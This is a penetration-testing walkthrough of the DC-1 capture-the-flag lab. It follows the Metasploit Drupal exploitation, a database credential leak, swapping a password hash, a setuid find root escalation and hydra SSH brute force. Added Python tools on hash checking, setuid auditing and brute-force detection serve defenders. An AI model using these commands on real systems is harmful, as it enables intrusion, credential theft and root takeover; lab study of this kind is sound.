A complete penetration-testing workflow
DC-1
Black-box testing:
vulnerabilities, CMS version ---- information
Process:
information gathering --- vulnerability probing --- verification --- brute force --- privilege escalation --- login
5 flags
The nmap tool
nmap -sP 192.168.88.142/24
DC-1 target IP
192.168.88.146
With the IP in hand, check its ports
nmap -A    scan the open ports
SQL injection
Directory scanning
Information leakage
Common CMS scanning
Find the CMS version: whatweb -v 192.168.88.146 (Kali)
Drupal 7
Or the Firefox extension Wappalyzer (fingerprinting)
Move on to exploiting Drupal
msfconsole (Kali)
search drupal
use 0-7 (any one of the listed modules)
View the module configuration
show options (mainly check rhosts, the target IP address)
Set the target IP address
set rhosts 192.168.88.146
then run
meterpreter (now in the post-exploitation module)
sysinfo (view basic system info)
Establish a reverse shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Once in the terminal, ls
Find flag1
cat flag1.txt
Every good CMS needs a config file - and so do you.
Following the hint, look for the config file
Continue with ls sites (the site directory)
README.txt all default example.sites.php
ls sites/default
default.settings.php files settings.php (the config file)
cat settings.php
Find flag2
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
Log into the database: mysql -udbuser -pR0ck3t
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
Notice the users table (a high-value table name)
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql> select * from users\G;    (\G prints each row vertically)
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
3 rows in set (0.00 sec)
We now have the accounts and passwords
The passwords are stored as hashes, not in clear text
Back in the www-data@DC-1:/var/www$ shell
find -name "*hash*"
./scripts/password-hash.sh
./scripts/password-hash.sh 123456    (generate the hash for 123456)
$S$DX6mS92o4EFQyd4inDWiO9SUwu09uSTuEJH2OG7zn6B1FOA063Rq
Go back into the database
Replace that uid's password hash with the hash for 123456
Log in to the website
Find flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
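The $S$ values in the users table and the one password-hash.sh printed above are Drupal 7's password format: a 12-character setting ($S$, one character encoding log2 of the iteration count, an 8-character salt) followed by a phpass-style base64 encoding of a SHA-512 that is re-applied 2^15 times. The Python below is an added example written for this page, not Drupal's code and not anything from the DC-1 box; it reimplements that format so a defender can verify a candidate password against a stored hash offline and can see why a leaked hash still costs real work per guess. The function names drupal7_crypt, drupal7_hash_password and drupal7_check_password are my own, os.urandom() stands in for Drupal's drupal_random_bytes() when generating a salt, and the setting $S$DX6mS92o4 (count character D = 2^15 rounds, salt X6mS92o4) and the full hash used in the demo are the values the page shows for 123456.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constants as defined in Drupal 7's includes/password.inc.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_COUNT_LOG2 = 15          # default: 2**15 = 32768 SHA-512 rounds per hash
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30
HASH_LENGTH = 55              # stored hashes are truncated to 55 characters


def _encode64(data: bytes) -> str:
    """phpass-style base64 used by Drupal 7 (not RFC 4648: own alphabet and bit order)."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> Optional[str]:
    """Hash `password` under a 12-char setting: "$S$" + count char + 8-char salt.

    A full stored hash may be passed as the setting; only its first 12 chars are used.
    Returns None for a malformed setting, where Drupal's _password_crypt() returns FALSE.
    """
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt, pw = setting[4:12].encode(), password.encode()
    # sha512(salt . password), then 2**count_log2 rounds of sha512(hash . password).
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _encode64(digest))[:HASH_LENGTH]


def drupal7_hash_password(password: str, salt: Optional[str] = None) -> str:
    """Produce a fresh hash the way scripts/password-hash.sh does.

    The salt is 8 encoded chars from 6 random bytes (os.urandom here, an assumption
    standing in for drupal_random_bytes). A fixed salt is accepted for reproducible tests.
    """
    if salt is None:
        salt = _encode64(os.urandom(6))
    hashed = drupal7_crypt(password, "$S$" + ITOA64[HASH_COUNT_LOG2] + salt)
    if hashed is None:
        raise ValueError("salt must be exactly 8 characters")
    return hashed


def drupal7_check_password(password: str, stored_hash: str) -> bool:
    """Verify a candidate against a stored $S$ hash, as user_check_password() does."""
    computed = drupal7_crypt(password, stored_hash)
    return computed is not None and hmac.compare_digest(computed, stored_hash)


if __name__ == "__main__":
    # Hash the page reports for ./scripts/password-hash.sh 123456 on DC-1.
    PAGE_HASH = "$S$DX6mS92o4EFQyd4inDWiO9SUwu09uSTuEJH2OG7zn6B1FOA063Rq"
    print("count exponent:", ITOA64.find(PAGE_HASH[3]), "salt:", PAGE_HASH[4:12])
    print("123456 verifies against the page's hash:",
          drupal7_check_password("123456", PAGE_HASH))
    # A fresh hash of the same password differs because the salt differs.
    print("fresh hash:", drupal7_hash_password("123456"))
```

Two points the walkthrough relies on follow from this. The attacker on DC-1 never cracked the admin hash; it replaced the stored value with a hash it had generated itself, so write access to the users table is equivalent to knowing every password, and a database credential in a world-readable settings.php is the real finding. And because each verification costs 32768 SHA-512 calls, offline guessing against a leaked $S$ hash is throttled by the count character stored in the hash itself, which is also why it can be raised later without invalidating existing hashes.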
www-data@DC-1:/var/www$ cat /etc/passwd
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
www-data@DC-1:/var/www$ cat /etc/shadow
cat: /etc/shadow: Permission denied
flag4
www-data@DC-1:/home/flag4$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
When access is denied, use
find / -perm -u=s -type f 2>/dev/null
find / -exec "/bin/bash" -p \;
The find command:
/    root directory (where to search)
-perm    permission bits
-u=s    the user's setuid bit (s = setuid privilege)
-type f    regular files only
2>/dev/null    discard error messages
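From the defender's side, the interesting fact in this step is not the find syntax but that /usr/bin/find carries the setuid bit at all: a stock Debian install has a short, stable list of setuid-root binaries, and anything outside that list is either a packaging mistake or a planted backdoor. The Python below is an added example, not part of the original notes, that performs the same walk as find / -perm -u=s -type f 2>/dev/null but compares the result against a baseline and reports the differences. The EXPECTED_SUID list and the build_demo_tree fixture are constructed for this example; derive a real baseline from a clean image of the host before relying on the output.

```python
import os
import stat
import tempfile
from typing import Dict, List, Set

# Constructed baseline for this example: setuid binaries a minimal Debian install
# is expected to carry (paths relative to /). Build a real one from a clean image
# and keep it under version control next to the audit script.
EXPECTED_SUID: Set[str] = {
    "bin/su", "bin/mount", "bin/umount", "bin/ping",
    "usr/bin/passwd", "usr/bin/sudo", "usr/bin/chsh", "usr/bin/chfn",
    "usr/bin/gpasswd", "usr/bin/newgrp",
}


def find_setuid_files(root: str) -> List[str]:
    """Pure-Python equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`.

    Returns paths relative to `root`, sorted, so results from different hosts
    (or from a fixture directory) compare directly against one baseline.
    """
    hits: List[str] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entry: the 2>/dev/null part
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def audit_setuid(root: str, expected: Set[str]) -> Dict[str, List[str]]:
    """Compare the live set of setuid files under `root` against a baseline."""
    found = find_setuid_files(root)
    return {
        "found": found,
        # New or planted: a setuid `find` falls in here.
        "unexpected": [p for p in found if p not in expected],
        # Removed, or mode changed: usually benign but worth a look.
        "missing": sorted(p for p in expected if p not in found),
    }


def build_demo_tree() -> str:
    """Constructed fixture: a fake root with one baseline setuid file (bin/su), one
    ordinary file (bin/ls) and a setuid `find`, the misconfiguration DC-1 ships with."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = {"bin/su": 0o4755, "bin/ls": 0o755, "usr/bin/find": 0o4755}
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    report = audit_setuid(demo, {"bin/su"})
    for path in report["unexpected"]:
        print(f"ALERT unexpected setuid file: {path}")
    # Against a real host run as root: audit_setuid("/", EXPECTED_SUID)
```

Run it from cron (or a configuration-management agent) and alert on a non-empty "unexpected" list; on DC-1 that list would contain usr/bin/find, which is exactly the entry the -exec "/bin/bash" -p step above depends on. Removing the bit (chmod u-s /usr/bin/find) closes that path, and the walk is cheap enough to repeat hourly.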
flag5
thefinalflag.txt
bash-4.2# cd /root
bash-4.2# ls
thefinalflag.txt
bash-4.2# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
bash-4.2#
Hydra
cat /usr/share/john/password.lst    (Kali's wordlist path)
hydra -l flag4 -P /usr/share/john/password.lst 192.168.88.146 ssh -vV -f
(brute force)
host: 192.168.88.146 login: flag4 password: orange
[STATUS] attack finished for 192.168.88.146 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-01 00:59:21
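What the hydra run above looks like from DC-1's own side is a burst of sshd "Failed password" lines from one source address followed by an "Accepted password" for the same user, and that pattern is what fail2ban-style detection keys on. The Python below is an added example, not part of the original notes and not code from any real tool: it parses a few constructed /var/log/auth.log lines (hostname, PIDs, timestamps, usernames and the RFC 5737 addresses 192.0.2.10 and 198.51.100.7 are all made up), raises an alert for any source that accumulates `threshold` failures inside a sliding window, and marks the alert as a likely compromise when a success follows the failures.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LOG_YEAR = 2022  # syslog lines carry no year; assume one so timestamp arithmetic works

# Constructed sample of /var/log/auth.log during and after a wordlist attack.
SAMPLE_AUTH_LOG = """\
Dec  1 00:58:50 DC-1 sshd[2011]: Failed password for flag4 from 192.0.2.10 port 51002 ssh2
Dec  1 00:58:51 DC-1 sshd[2013]: Failed password for flag4 from 192.0.2.10 port 51004 ssh2
Dec  1 00:58:53 DC-1 sshd[2015]: Failed password for invalid user test from 192.0.2.10 port 51006 ssh2
Dec  1 00:58:55 DC-1 sshd[2017]: Failed password for flag4 from 192.0.2.10 port 51008 ssh2
Dec  1 00:58:58 DC-1 sshd[2019]: Failed password for flag4 from 192.0.2.10 port 51010 ssh2
Dec  1 00:59:02 DC-1 sshd[2021]: Failed password for flag4 from 192.0.2.10 port 51012 ssh2
Dec  1 00:59:21 DC-1 sshd[2041]: Accepted password for flag4 from 192.0.2.10 port 51040 ssh2
Dec  1 01:10:03 DC-1 sshd[2100]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Dec  1 01:10:40 DC-1 sshd[2102]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
Dec  1 01:12:00 DC-1 CRON[2150]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# One sshd password-auth line; "invalid user" appears when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

Event = Tuple[datetime, str, str, str]  # (timestamp, source ip, user, "Failed"|"Accepted")


def parse_auth_log(text: str) -> List[Event]:
    """Extract sshd password-authentication events; unrelated lines are skipped."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=LOG_YEAR)
        events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect_bruteforce(text: str, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Alert on any source IP with >= threshold failures inside a sliding window.

    An alert gains success_after_failures=True if the same IP later authenticates,
    which is hydra's "valid pair found" seen from the server and the case to page on.
    """
    recent_failures: Dict[str, List[datetime]] = defaultdict(list)
    tried_users: Dict[str, set] = defaultdict(set)
    alerts: Dict[str, Dict] = {}
    for ts, ip, user, result in sorted(parse_auth_log(text)):
        if result == "Failed":
            tried_users[ip].add(user)
            # Keep only failures still inside the window, then add this one.
            recent = [t for t in recent_failures[ip] if ts - t <= window] + [ts]
            recent_failures[ip] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(ip, {
                    "ip": ip, "users": tried_users[ip], "failures": 0,
                    "first_seen": recent[0], "success_after_failures": False,
                })
                alert["failures"] = max(alert["failures"], len(recent))
        elif ip in alerts:
            alerts[ip]["success_after_failures"] = True
            alerts[ip]["compromised_user"] = user
    return [alerts[ip] for ip in sorted(alerts)]


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        tag = "COMPROMISED" if a["success_after_failures"] else "brute force"
        print(f"{tag}: {a['ip']} {a['failures']} failures since "
              f"{a['first_seen']:%H:%M:%S} users={sorted(a['users'])}")
```

With the default threshold the attacking address is flagged on its fifth failure, well before the -f run above finds the valid pair, which is the point at which a ban or a rate limit would have stopped it; the single failure from 198.51.100.7 is an ordinary typo and stays quiet. On a real host the same logic belongs in fail2ban or the SIEM, with key-only authentication for accounts like flag4 removing the password surface entirely.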
Log in with the recovered password
ssh flag4@192.168.88.146
The authenticity of host '192.168.88.146 (192.168.88.146)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.146' (ECDSA) to the list of known hosts.
flag4@192.168.88.146's password:
Permission denied, please try again.
flag4@192.168.88.146's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$